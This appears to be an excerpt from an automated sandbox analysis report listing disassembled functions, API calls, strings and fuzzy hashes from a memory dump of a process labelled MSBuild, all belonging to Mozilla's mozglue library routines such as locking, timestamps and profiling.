Opcode Fuzzy Hash: 96ffb1108c15a7147588d3a6e1693d410ade20905a11266ac20207a154eda81d
Instruction Fuzzy Hash: B34126757016009BEB10EB65CC2DFAA7775EB8630DF06021DE90987F01DB71A805CBEA

Function 6C4ED840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4ED85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED918
GetCurrentThreadId.KERNEL32 ref: 6C4ED93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED970
GetCurrentThreadId.KERNEL32 ref: 6C4ED976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C4EDA2E
GetCurrentThreadId.KERNEL32 ref: 6C4EDA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4EDA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C4EDA91

Part of subcall function 6C4B5C50: GetTickCount64.KERNEL32 ref: 6C4B5D40
Part of subcall function 6C4B5C50: EnterCriticalSection.KERNEL32(6C51F688), ref: 6C4B5D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4EDAB7

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: 0a2e46a185a817e25044faddc52836e6f846fefc6b714c9cdedee12a7984a704
Instruction ID: 5c3164fa39cc20c6ebb3896c679dbb1b69ff1105a366da92b6c2d5129d8e00e5
Opcode Fuzzy Hash: 0a2e46a185a817e25044faddc52836e6f846fefc6b714c9cdedee12a7984a704
Instruction Fuzzy Hash: 5471BE756003049FCB00DF28C888F9ABBF5FF89315F16866EE85A9B701DB30A945CB95

Function 6C4ED4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4ED4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED52A
GetCurrentThreadId.KERNEL32 ref: 6C4ED530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED55F
free.MOZGLUE(00000000), ref: 6C4ED585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C4ED5D3
GetCurrentThreadId.KERNEL32 ref: 6C4ED5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED652
GetCurrentThreadId.KERNEL32 ref: 6C4ED658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED6A2

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: aba08841cdb8a087082bfb5bc4f86e6872ced0dbf4a91add2e37f51e225db692
Instruction ID: a5fc39bd1fede0ea317348af6343eda57918a616b5df8b571444a1de84e2a97f
Opcode Fuzzy Hash: aba08841cdb8a087082bfb5bc4f86e6872ced0dbf4a91add2e37f51e225db692
Instruction Fuzzy Hash: D2515BB5604705DFC704DF34C888A9ABBF4FF89319F01862EE85A87B11DB31A945CB95

Function 6C491E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51E784), ref: 6C491EC1
LeaveCriticalSection.KERNEL32(6C51E784), ref: 6C491EE1
EnterCriticalSection.KERNEL32(6C51E744), ref: 6C491F38
LeaveCriticalSection.KERNEL32(6C51E744), ref: 6C491F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C491F83
LeaveCriticalSection.KERNEL32(6C51E784), ref: 6C491FC0
EnterCriticalSection.KERNEL32(6C51E784), ref: 6C491FE2
LeaveCriticalSection.KERNEL32(6C51E784), ref: 6C491FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C492019

Strings

\Ql, xrefs: 6C491F3E
DQl, xrefs: 6C491F56
DQl, xrefs: 6C491F32
MOZ_CRASH(), xrefs: 6C492000

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: DQl$DQl$MOZ_CRASH()$\Ql
API String ID: 2055633661-185258750
Opcode ID: cf452853a5c7ed39ee22e287a3117dae034585de6d5dc95e0779896b546143d3
Instruction ID: 7049a3f9f01fb2955b49513c77353e1a81e9e0e5b614fc7cf24d65904fd45df8
Opcode Fuzzy Hash: cf452853a5c7ed39ee22e287a3117dae034585de6d5dc95e0779896b546143d3
Instruction Fuzzy Hash: E141B3B5B043598BEF00DFA8CC8DF6A3BB5EB49348F050129E91597F45DBB198048BD9

Function 6C4B5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C4B56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4B56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C4B56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C4B5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C4B57BC
GetTickCount64.KERNEL32 ref: 6C4B58CB
EnterCriticalSection.KERNEL32(6C51F688), ref: 6C4B58F3
__aulldiv.LIBCMT ref: 6C4B5945
LeaveCriticalSection.KERNEL32(6C51F688), ref: 6C4B59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C51F638,?,?,?,?), ref: 6C4B59E9

Strings

MOZ_APP_RESTART, xrefs: 6C4B56CC

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: e278ea77126749ce0835a86a616d9439ac5ed956f55e6e7d2015944231ca3751
Instruction ID: 91f4a2b7bf11533796f9ebeb0dde0555c8e3cab88522a283a5bff78c9b6c4965
Opcode Fuzzy Hash: e278ea77126749ce0835a86a616d9439ac5ed956f55e6e7d2015944231ca3751
Instruction Fuzzy Hash: 29C17E71A083409FD705CF28C845A5AF7F1BF9A754F168B1DE8C8A7B60D730A885CB96

Function 6C4DEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DEC8C

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

GetCurrentThreadId.KERNEL32 ref: 6C4DECA1
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C4DECC5
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C4DED19
CloseHandle.KERNEL32(?), ref: 6C4DED28
free.MOZGLUE(00000000), ref: 6C4DED2F
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C4DEC94

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 49becd5fcf620594092c39e34e6e36c8ffd76d720f4ae147748f37e45d217ec2
Instruction ID: 262e2fb9aeb7b719b8b21b84e4820b244a955e59cc6cf61b92265f9c71c46ae8
Opcode Fuzzy Hash: 49becd5fcf620594092c39e34e6e36c8ffd76d720f4ae147748f37e45d217ec2
Instruction Fuzzy Hash: 7021F0B5600104AFEB00EF25DC5DF9ABB79EB4626DF124314F81887B41DB71A8068BE5

Function 6C4F5FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C4F6009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C4F6024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(QIl,?), ref: 6C4F6046
OutputDebugStringA.KERNEL32(?,QIl,?), ref: 6C4F6061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4F6069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4F6073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4F6082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C51148E), ref: 6C4F6091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,QIl,00000000,?), ref: 6C4F60BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4F60C4

Strings

QIl, xrefs: 6C4F5FFC, 6C4F6042, 6C4F6045, 6C4F60B3

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID: QIl
API String ID: 3835517998-834453583
Opcode ID: f54ef324f00fa8973b1f3847f7c53ccf0ab3bbe04680d3a3f996cb7ad275fd8c
Instruction ID: 98bc87787b8c45e33c16158ef2a6b87bf74cfc03902d3b6e404d3224a1edb24b
Opcode Fuzzy Hash: f54ef324f00fa8973b1f3847f7c53ccf0ab3bbe04680d3a3f996cb7ad275fd8c
Instruction Fuzzy Hash: D321D3B1A002089FDB10AF24DC0DEAA7BB8FF45218F018428E81A97740CB75A549CFD6

Function 6C4D8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C49EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C49EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C4DB392,?,?,00000001), ref: 6C4D91F4

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

Strings

timeline-ipc, xrefs: 6C4D9096
stack-chart, xrefs: 6C4D90B2
timeline-overview, xrefs: 6C4D907A
name, xrefs: 6C4D8F16
data, xrefs: 6C4D90E8
marker-table, xrefs: 6C4D906C
marker-chart, xrefs: 6C4D905E
timeline-memory, xrefs: 6C4D9088
timeline-fileio, xrefs: 6C4D90A4

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: 60ec1dfb22b732cb56e6484d6e25d1aaa5f37ec1c47ee1d2d39e8c42cfab5c45
Instruction ID: 82f3d72f330c17d2cbd20f0be5a0bd63f91ea47551405b0907673b9aefe44eee
Opcode Fuzzy Hash: 60ec1dfb22b732cb56e6484d6e25d1aaa5f37ec1c47ee1d2d39e8c42cfab5c45
Instruction Fuzzy Hash: 43B1C2B0B012099BDB04DF94C8A6FAEBBB5BF95318F11451DD406ABF80DB31A945CBD1

Function 6C4BC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C4BC5A3
WideCharToMultiByte.KERNEL32 ref: 6C4BC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C4BC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C4BCA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4BCA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4BCAA5

Strings

(null), xrefs: 6C4BC596
0, xrefs: 6C4BD30A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: f9355d39c40ba958c7560fed27ffe693c8bc2f4de6bb7c88bb055080750a56b3
Instruction ID: cf3ff707a244262ca24479442449edf19a318674d91130fc290fc4dfe441145b
Opcode Fuzzy Hash: f9355d39c40ba958c7560fed27ffe693c8bc2f4de6bb7c88bb055080750a56b3
Instruction Fuzzy Hash: 3FA1AE306093429FDB00DF28C994F5ABBE1AF89749F04896DE899E7741D735E805CBA2

Function 6C4948E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,6C4D483A,?), ref: 6C494ACB
memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C4D483A,?), ref: 6C494AE0
moz_xmalloc.MOZGLUE(?,?,6C4D483A,?), ref: 6C494A82

Part of subcall function 6C4ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C4ACAA2

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C4D483A,?), ref: 6C494A97
moz_xmalloc.MOZGLUE(?,?,6C4D483A,?), ref: 6C494A35

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C4D483A,?), ref: 6C494A4A
moz_xmalloc.MOZGLUE(?,?,6C4D483A,?), ref: 6C494AF4
moz_xmalloc.MOZGLUE(?,?,6C4D483A,?), ref: 6C494B10
moz_xmalloc.MOZGLUE(?,?,6C4D483A,?), ref: 6C494B2C

Strings

:HMl, xrefs: 6C4948EB, 6C4949FB

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID: :HMl
API String ID: 4251373892-3246917530
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: 90d1c8d1fad20242fd7f5651ede5a0a59518a3d7ca16ddf94f9a4903074dd580
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 607169B1A006068FC754CF68C480EAABBF4FF19348B10463ED56A8BB50E731E955CB80

Function 6C4BC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C4BC784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4BC801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C4BC83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C4BC891

Strings

INF, xrefs: 6C4BC794
NAN, xrefs: 6C4BC7AD
nan, xrefs: 6C4BC7A8
inf, xrefs: 6C4BC78F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 39173d8256ea3692cf6bbf97cc7c709f84fe5154278b27989ea085e94de3271a
Instruction ID: 157914767cdbd349553ecc4b9088a93e48a402feefcb1eb8dca2dddb21495009
Opcode Fuzzy Hash: 39173d8256ea3692cf6bbf97cc7c709f84fe5154278b27989ea085e94de3271a
Instruction Fuzzy Hash: B15193706087408BDB00EF2CC485E9AFBF1BF9A305F004A2DE9D5A7651E771D9898B52

Function 6C493480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C493492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4934A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4934EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C49350E
__Init_thread_footer.LIBCMT ref: 6C493522
__aulldiv.LIBCMT ref: 6C493552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C49357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C493592

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C493508
kernel32.dll, xrefs: 6C4934EA

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 29a817121ed1e84b74d691acd67f48750f5cdcabcb49cd7259aad9df1e4812b0
Instruction ID: 1f0b6d00585938c55f0a60028a9827f234eb25283e40b8dc33d9d4fe81f4289e
Opcode Fuzzy Hash: 29a817121ed1e84b74d691acd67f48750f5cdcabcb49cd7259aad9df1e4812b0
Instruction Fuzzy Hash: 4C31C1B4B002159BDF00DFB5CC4DEAA7BB5FB4A329F110619E505E3B60EB70A904CB65

Function 6C494480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C4D4843,?), ref: 6C4945F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C4D4843,?), ref: 6C49468A
free.MOZGLUE(?,?,?,?,?,?,6C4D4843,?), ref: 6C4946C9
free.MOZGLUE(?), ref: 6C4946EF
free.MOZGLUE(?), ref: 6C494712
free.MOZGLUE(?), ref: 6C494735
free.MOZGLUE(?), ref: 6C494758
free.MOZGLUE(?), ref: 6C49477B
free.MOZGLUE(?), ref: 6C49479E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 3171aeeb8c39e8b9f53e65cf11a1c13d628298af8e7110252f8c73b0b6d8c831
Instruction ID: a79dfdd5269299c4f6e47951b98699f63ad3085e5a6c421c9e9c7bd0b6359011
Opcode Fuzzy Hash: 3171aeeb8c39e8b9f53e65cf11a1c13d628298af8e7110252f8c73b0b6d8c831
Instruction Fuzzy Hash: 92B10475A001208FDB18DF7CDC94F6D7BA2AF423A8F18566CE436DBB96D73099408B91

Function 6C4FAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C4FAC52
CreateFileMappingW.KERNEL32 ref: 6C4FAC7D
GetSystemInfo.KERNEL32 ref: 6C4FAC98
MapViewOfFile.KERNEL32 ref: 6C4FACB0
GetSystemInfo.KERNEL32 ref: 6C4FACCD
MapViewOfFile.KERNEL32 ref: 6C4FAD05
UnmapViewOfFile.KERNEL32 ref: 6C4FAD1C
CloseHandle.KERNEL32 ref: 6C4FAD28
UnmapViewOfFile.KERNEL32 ref: 6C4FAD37
CloseHandle.KERNEL32 ref: 6C4FAD43
CloseHandle.KERNEL32 ref: 6C4FAD67

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

